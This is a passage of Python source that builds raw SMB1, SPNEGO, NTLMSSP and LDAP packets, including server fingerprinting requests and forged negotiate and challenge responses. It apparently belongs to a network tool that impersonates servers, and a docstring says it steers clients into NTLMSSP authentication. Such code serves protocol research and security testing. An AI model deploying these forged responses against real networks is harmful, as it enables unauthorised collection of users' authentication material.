        CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
        ###### AvPairs Offset
        # NOTE: str() added around the AVPairs2Id/3Id/5Id/6Id lookups for
        # consistency with every other term (they were bare lookups before;
        # behaviorally identical while all fields are str).
        CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
        ###### LDAP Packet Len
        CalculatePacketLen = str(self.fields["MessageIDASNID"])+str(self.fields["MessageIDASNLen"])+str(self.fields["MessageIDASNStr"])+str(self.fields["OpHeadASNID"])+str(self.fields["OpHeadASNIDLenOfLen"])+str(self.fields["OpHeadASNIDLen"])+str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
        OperationPacketLen = str(self.fields["Status"])+str(self.fields["StatusASNLen"])+str(self.fields["StatusASNStr"])+str(self.fields["MatchedDN"])+str(self.fields["ErrorMessage"])+str(self.fields["SequenceHeader"])+str(self.fields["SequenceHeaderLen"])+str(self.fields["SequenceHeaderLenOfLen"])+CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
        NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs
        ##### LDAP Len Calculation:
        self.fields["ParserHeadASNLen"] = struct.pack(">i", len(CalculatePacketLen))
        self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen))
        self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen))
        ##### Workstation Offset Calculation:
        self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
        self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
        self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
        ##### IvPairs Offset Calculation:
        self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
        self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
        self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
        ##### IvPair Calculation:
        self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
        self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
        self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
        self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
        self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
##### SMB Packets #####
class SMBHeader(Packet):
    """SMB1 packet header: 0xFF 'SMB' magic followed by command byte and
    the remaining header fields, all zeroed by default."""
    fields = OrderedDict([
        ("proto", "\xff\x53\x4d\x42"),  # "\xFF SMB" protocol magic
        ("cmd", "\x72"),  # default 0x72 = SMB_COM_NEGOTIATE
        ("errorcode", "\x00\x00\x00\x00"),
        ("flag1", "\x00"),
        ("flag2", "\x00\x00"),
        ("pidhigh", "\x00\x00"),
        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("reserved", "\x00\x00"),
        ("tid", "\x00\x00"),
        ("pid", "\x00\x00"),
        ("uid", "\x00\x00"),
        ("mid", "\x00\x00"),
    ])
class SMBNego(Packet):
    """SMB1 Negotiate body: word count, byte count, and a caller-supplied
    dialect payload in ``data``."""
    fields = OrderedDict([
        ("wordcount", "\x00"),
        ("bcc", "\x62\x00"),
        ("data", "")
    ])
    def calculate(self):
        # Recompute the byte count from whatever payload was assigned.
        payload = str(self.fields["data"])
        self.fields["bcc"] = struct.pack("<h", len(payload))
class SMBNegoData(Packet):
    """SMB1 Negotiate request advertising two dialects:
    "PC NETWORK PROGRAM 1.0" and "LANMAN1.0"."""
    fields = OrderedDict([
        ("wordcount", "\x00"),
        ("bcc", "\x54\x00"),
        ("separator1", "\x02"),
        ("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
        ("separator2", "\x02"),
        ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
    ])
    def calculate(self):
        # Byte count spans both dialect entries (separator byte + string).
        keys = ("separator1", "dialect1", "separator2", "dialect2")
        body = "".join(str(self.fields[k]) for k in keys)
        self.fields["bcc"] = struct.pack("<h", len(body))
class SMBSessionData(Packet):
    """SMB1 Session Setup AndX request body (pre-NTLMSSP style) with
    account name/password and OS identification strings."""
    fields = OrderedDict([
        ("wordcount", "\x0a"),
        ("AndXCommand", "\xff"),  # 0xFF = no further AndX command
        ("reserved", "\x00"),
        ("andxoffset", "\x00\x00"),
        ("maxbuff", "\xff\xff"),
        ("maxmpx", "\x02\x00"),
        ("vcnum", "\x01\x00"),
        ("sessionkey", "\x00\x00\x00\x00"),
        ("PasswordLen", "\x18\x00"),
        ("reserved2", "\x00\x00\x00\x00"),
        ("bcc", "\x3b\x00"),
        ("AccountPassword", ""),
        ("AccountName", ""),
        ("AccountNameTerminator", "\x00"),
        ("PrimaryDomain", "WORKGROUP"),
        ("PrimaryDomainTerminator", "\x00"),
        ("NativeOs", "Unix"),
        ("NativeOsTerminator", "\x00"),
        ("NativeLanman", "Samba"),
        ("NativeLanmanTerminator", "\x00"),
    ])
    def calculate(self):
        # Byte count covers everything after the fixed parameter words.
        tail_keys = (
            "AccountPassword", "AccountName", "AccountNameTerminator",
            "PrimaryDomain", "PrimaryDomainTerminator",
            "NativeOs", "NativeOsTerminator",
            "NativeLanman", "NativeLanmanTerminator",
        )
        tail = "".join(str(self.fields[k]) for k in tail_keys)
        self.fields["bcc"] = struct.pack("<h", len(tail))
        self.fields["PasswordLen"] = struct.pack("<h", len(str(self.fields["AccountPassword"])))
class SMBNegoFingerData(Packet):
    """Dialect list for a Negotiate request used when fingerprinting a
    server; each entry is a 0x02 separator plus a NUL-terminated name."""
    fields = OrderedDict([
        ("separator1","\x02" ),
        ("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),  # "PC NETWORK PROGRAM 1.0"
        ("separator2","\x02"),
        ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),  # "LANMAN1.0"
        ("separator3","\x02"),
        ("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),  # "Windows for Workgroups 3.1a"
        ("separator4","\x02"),
        ("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),  # "LM1.2X002"
        ("separator5","\x02"),
        ("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),  # "LANMAN2.1"
        ("separator6","\x02"),
        ("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),  # "NT LM 0.12"
    ])
class SMBSessionFingerData(Packet):
    """Session Setup AndX request carrying a canned SPNEGO/NTLMSSP
    NEGOTIATE security blob, used for fingerprinting."""
    fields = OrderedDict([
        ("wordcount", "\x0c"),
        ("AndXCommand", "\xff"),  # 0xFF = no further AndX command
        ("reserved","\x00" ),
        ("andxoffset", "\x00\x00"),
        ("maxbuff","\x04\x11"),
        ("maxmpx", "\x32\x00"),
        ("vcnum","\x00\x00"),
        ("sessionkey", "\x00\x00\x00\x00"),
        ("securitybloblength","\x4a\x00"),
        ("reserved2","\x00\x00\x00\x00"),
        ("capabilities", "\xd4\x00\x00\xa0"),
        ("bcc1",""),
        ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
    ])
    def calculate(self):
        # bcc1 is the 2-byte byte count of the security blob; pack as a
        # 4-byte little-endian int and keep the low two bytes.
        blob = str(self.fields["Data"])
        self.fields["bcc1"] = struct.pack("<i", len(blob))[:2]
class SMBTreeConnectData(Packet):
    """SMB1 Tree Connect AndX request; ``Path`` is the UNC share and
    ``Service`` "?????" matches any service type."""
    fields = OrderedDict([
        ("Wordcount", "\x04"),
        ("AndXCommand", "\xff"),  # 0xFF = no further AndX command
        ("Reserved", "\x00"),
        ("Andxoffset", "\x00\x00"),
        ("Flags", "\x08\x00"),
        ("PasswdLen", "\x01\x00"),
        ("Bcc", "\x1b\x00"),
        ("Passwd", "\x00"),
        ("Path", ""),
        ("PathTerminator", "\x00"),
        ("Service", "?????"),
        ("Terminator", "\x00"),
    ])
    def calculate(self):
        flds = self.fields
        # Password length, truncated to the protocol's 2-byte field.
        flds["PasswdLen"] = struct.pack("<h", len(str(flds["Passwd"])))[:2]
        # Byte count covers password, path and service strings.
        tail = "".join(str(flds[k]) for k in
                       ("Passwd", "Path", "PathTerminator", "Service", "Terminator"))
        flds["Bcc"] = struct.pack("<h", len(tail))
class RAPNetServerEnum3Data(Packet):
    """RAP NetServerEnum3 request parameters (API number 0xD7 = 215),
    asking a browser for its server list."""
    fields = OrderedDict([
        ("Command", "\xd7\x00"),  # little-endian 215 = NetServerEnum3
        ("ParamDescriptor", "WrLehDzz"),
        ("ParamDescriptorTerminator", "\x00"),
        ("ReturnDescriptor","B16BBDz"),
        ("ReturnDescriptorTerminator", "\x00"),
        ("DetailLevel", "\x01\x00"),
        ("RecvBuff","\xff\xff"),
        ("ServerType", "\x00\x00\x00\x80"),
        ("TargetDomain","SMB"),
        ("RapTerminator","\x00"),
        ("TargetName","ABCD"),
        ("RapTerminator2","\x00"),
    ])
class SMBTransRAPData(Packet):
    """SMB1 Transaction request wrapping a RAP call over \\PIPE\\LANMAN.

    ``calculate`` recomputes the parameter counts, the parameter offset
    (relative to the start of the SMB header) and the byte count from the
    RAP payload assigned to ``Data``.
    """
    fields = OrderedDict([
        ("Wordcount", "\x0e"),
        ("TotalParamCount", "\x24\x00"),
        ("TotalDataCount","\x00\x00" ),
        ("MaxParamCount", "\x08\x00"),
        ("MaxDataCount","\xff\xff"),
        ("MaxSetupCount", "\x00"),
        ("Reserved","\x00\x00"),
        ("Flags", "\x00"),
        ("Timeout","\x00\x00\x00\x00"),
        ("Reserved1","\x00\x00"),
        ("ParamCount","\x24\x00"),
        ("ParamOffset", "\x5a\x00"),
        ("DataCount", "\x00\x00"),
        ("DataOffset", "\x7e\x00"),
        ("SetupCount", "\x00"),
        ("Reserved2", "\x00"),
        ("Bcc", "\x3f\x00"),
        ("Terminator", "\x00"),
        ("PipeName", "\\PIPE\\LANMAN"),
        ("PipeTerminator","\x00\x00"),
        ("Data", ""),
    ])
    def calculate(self):
        #Padding
        # NOTE(review): terminator doubles as alignment padding -- 4 vs 3
        # NULs depending on payload parity; presumably to keep the RAP
        # parameters 2-byte aligned after the UTF-16 pipe name.
        if len(str(self.fields["Data"]))%2==0:
           self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
        else:
           self.fields["PipeTerminator"] = "\x00\x00\x00"
        ##Convert Path to Unicode first before any Len calc.
        self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
        ##Data Len
        self.fields["TotalParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
        self.fields["ParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
        ##Packet len
        FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
        # +32 accounts for the fixed-size SMB header that precedes this body.
        self.fields["ParamOffset"] = struct.pack("<i", len(FindRAPOffset)+32)[:2]
        ##Bcc Buff Len
        BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
        self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
class SMBNegoAnsLM(Packet):
    """SMB1 Negotiate response in pre-NTLMSSP (LM challenge) style: an
    8-byte challenge key plus UTF-16 domain and server names."""
    fields = OrderedDict([
        ("Wordcount", "\x11"),
        ("Dialect", ""),
        ("Securitymode", "\x03"),
        ("MaxMpx", "\x32\x00"),
        ("MaxVc", "\x01\x00"),
        ("Maxbuffsize", "\x04\x41\x00\x00"),
        ("Maxrawbuff", "\x00\x00\x01\x00"),
        ("Sessionkey", "\x00\x00\x00\x00"),
        ("Capabilities", "\xfc\x3e\x01\x00"),
        ("Systemtime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
        ("Srvtimezone", "\x2c\x01"),
        ("Keylength", "\x08"),
        ("Bcc", "\x10\x00"),
        ("Key", ""),
        ("Domain", "SMB"),
        ("DomainNull", "\x00\x00"),
        ("Server", "SMB-TOOLKIT"),
        ("ServerNull", "\x00\x00"),
    ])
    def calculate(self):
        flds = self.fields
        # Names go on the wire as UTF-16LE.
        flds["Domain"] = flds["Domain"].encode('utf-16le')
        flds["Server"] = flds["Server"].encode('utf-16le')
        # Byte count covers key + both NUL-terminated names.
        tail = "".join(str(flds[k]) for k in
                       ("Key", "Domain", "DomainNull", "Server", "ServerNull"))
        flds["Bcc"] = struct.pack("<h", len(tail))
        # Single-byte key length: low byte of a packed short.
        # NOTE(review): indexing [0] yields a 1-char str on Python 2 but an
        # int on Python 3 -- confirm target interpreter before porting.
        flds["Keylength"] = struct.pack("<h", len(flds["Key"]))[0]
class SMBNegoAns(Packet):
    """SMB1 Negotiate response with extended security: a SPNEGO NegTokenInit
    offering only the NTLMSSP mechanism OID (1.3.6.1.4.1.311.2.2.10) plus a
    principal-name hint; ``calculate`` rewrites every nested ASN.1 length.
    """
    fields = OrderedDict([
        ("Wordcount", "\x11"),
        ("Dialect", ""),
        ("Securitymode", "\x03"),
        ("MaxMpx", "\x32\x00"),
        ("MaxVc", "\x01\x00"),
        ("MaxBuffSize", "\x04\x41\x00\x00"),
        ("MaxRawBuff", "\x00\x00\x01\x00"),
        ("SessionKey", "\x00\x00\x00\x00"),
        ("Capabilities", "\xfd\xf3\x01\x80"),
        ("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
        ("SrvTimeZone", "\xf0\x00"),
        ("KeyLen", "\x00"),
        ("Bcc", "\x57\x00"),
        ("Guid", "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
        ("InitContextTokenASNId", "\x60"),
        ("InitContextTokenASNLen", "\x5b"),
        ("ThisMechASNId", "\x06"),  # ASN.1 OID tag
        ("ThisMechASNLen", "\x06"),
        ("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),  # SPNEGO OID 1.3.6.1.5.5.2
        ("SpNegoTokenASNId", "\xA0"),
        ("SpNegoTokenASNLen", "\x51"),
        ("NegTokenASNId", "\x30"),
        ("NegTokenASNLen", "\x4f"),
        ("NegTokenTag0ASNId", "\xA0"),
        ("NegTokenTag0ASNLen", "\x30"),
        ("NegThisMechASNId", "\x30"),
        ("NegThisMechASNLen", "\x2e"),
        ("NegThisMech4ASNId", "\x06"),
        ("NegThisMech4ASNLen", "\x09"),
        ("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),  # NTLMSSP OID
        ("NegTokenTag3ASNId", "\xA3"),
        ("NegTokenTag3ASNLen", "\x1b"),
        ("NegHintASNId", "\x30"),
        ("NegHintASNLen", "\x19"),
        ("NegHintTag0ASNId", "\xa0"),
        ("NegHintTag0ASNLen", "\x17"),
        ("NegHintFinalASNId", "\x1b"),
        ("NegHintFinalASNLen", "\x15"),
        ("NegHintFinalASNStr", "server2008$@SMB.LOCAL"),
    ])
    def calculate(self):
        # Concatenations mirror the nesting of the SPNEGO token; each ASN.1
        # length is then re-packed from the span it covers.
        CompleteBCCLen1 = str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
        AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
        AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
        MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
        Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
        self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
        self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
        self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
        self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
        self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
        self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
        self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
        self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
        self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
        self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
        self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
        self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
class SMBNegoKerbAns(Packet):
    """SMB_COM_NEGOTIATE (0x72) response advertising extended security.

    Carries a GSS-API/SPNEGO negTokenInit listing four authentication
    mechanism OIDs plus a negHints principal name, so the client is steered
    into an NTLMSSP session setup.  All of the *ASNLen fields below are
    placeholders: calculate() overwrites them with the real DER lengths
    once the variable-length parts are assembled.
    """
    fields = OrderedDict([
        ("Wordcount", "\x11"),
        ("Dialect", ""),
        ("Securitymode", "\x03"),
        ("MaxMpx", "\x32\x00"),
        ("MaxVc", "\x01\x00"),
        ("MaxBuffSize", "\x04\x41\x00\x00"),
        ("MaxRawBuff", "\x00\x00\x01\x00"),
        ("SessionKey", "\x00\x00\x00\x00"),
        ("Capabilities", "\xfd\xf3\x01\x80"),
        ("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
        ("SrvTimeZone", "\xf0\x00"),
        ("KeyLen", "\x00"),
        ("Bcc", "\x57\x00"),
        ("Guid", "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
        ("InitContextTokenASNId", "\x60"),
        ("InitContextTokenASNLen", "\x5b"),
        ("ThisMechASNId", "\x06"),
        ("ThisMechASNLen", "\x06"),
        ("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
        ("SpNegoTokenASNId", "\xA0"),
        ("SpNegoTokenASNLen", "\x51"),
        ("NegTokenASNId", "\x30"),
        ("NegTokenASNLen", "\x4f"),
        ("NegTokenTag0ASNId", "\xA0"),
        ("NegTokenTag0ASNLen", "\x30"),
        ("NegThisMechASNId", "\x30"),
        ("NegThisMechASNLen", "\x2e"),
        ("NegThisMech1ASNId", "\x06"),
        ("NegThisMech1ASNLen", "\x09"),
        ("NegThisMech1ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
        ("NegThisMech2ASNId", "\x06"),
        ("NegThisMech2ASNLen", "\x09"),
        ("NegThisMech2ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
        ("NegThisMech3ASNId", "\x06"),
        ("NegThisMech3ASNLen", "\x0a"),
        ("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
        ("NegThisMech4ASNId", "\x06"),
        ("NegThisMech4ASNLen", "\x09"),
        ("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
        ("NegTokenTag3ASNId", "\xA3"),
        ("NegTokenTag3ASNLen", "\x1b"),
        ("NegHintASNId", "\x30"),
        ("NegHintASNLen", "\x19"),
        ("NegHintTag0ASNId", "\xa0"),
        ("NegHintTag0ASNLen", "\x17"),
        ("NegHintFinalASNId", "\x1b"),
        ("NegHintFinalASNLen", "\x15"),
        ("NegHintFinalASNStr", "server2008$@SMB.LOCAL"),
    ])
    def calculate(self):
        """Recompute the SMB byte count and every nested DER length field.

        Each helper string below concatenates the fields that a particular
        length octet must cover; the lengths are then written back as
        single-byte DER lengths (all payloads here are < 128 bytes).
        """
        # Everything after the fixed word block: counted by the SMB Bcc.
        CompleteBCCLen1 = str(self.fields["Guid"])+str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
        # Contents of the outer GSS-API InitialContextToken (tag 0x60).
